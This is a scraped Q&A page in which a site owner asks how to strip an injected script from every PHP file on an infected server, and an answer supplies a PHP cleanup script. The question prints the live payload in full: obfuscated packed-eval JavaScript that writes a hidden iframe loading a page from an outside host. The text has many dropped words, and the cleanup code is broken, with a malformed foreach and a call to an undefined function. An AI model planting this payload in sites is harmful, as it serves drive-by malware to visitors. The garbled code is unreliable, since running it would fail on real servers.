html - How can i remove an iframe virus from all of php files on my website -

i have problem removing virus code php files. there more 1200 php files in server , every single php file has been infected virus. virus code adding line html output

here virus code :

<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.tostring(36)};if(!''.replace(/^/,string)){while(c--){d[c.tostring(a)]=k[c]||c.tostring(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new regexp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|settimeout|k22|k2|http|125||src|height|230|width|board||248|php|58|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352> 

above code in every single php file. how can remove virus code every php file ? there quick way doing it?

you can use:

removevirus.php

<?php  foreach(rglob("*.php") $virusfile){      $withvirus = file_get_contents($virusfile);     $withoutvirus = preg_replace('%<tag\d+>.*</tag\d+>%', '', $withvirus);     file_put_contents($virusfile, $withoutvirus); }  function rglob($pattern, $flags = 0){ // forked https://github.com/rodurma/php-functions/     // blob/master/glob_recursive.php   $files = glob($pattern, $flags);    foreach (glob(dirname($pattern).'/*',      glob_onlydir|glob_nosort) $dir){     $files = array_merge($files, glob_recursive         ($dir.'/'.basename($pattern), $flags));   }   return $files; } 

---

usage:

put removevirus.php on root of website , execute shell root (or owner of files)

php removevirus.php 

---

notes:

1 - i've tested code on server 10 php files containing virus , worked intended.

2 - make sure find source of hack , patch system accordingly.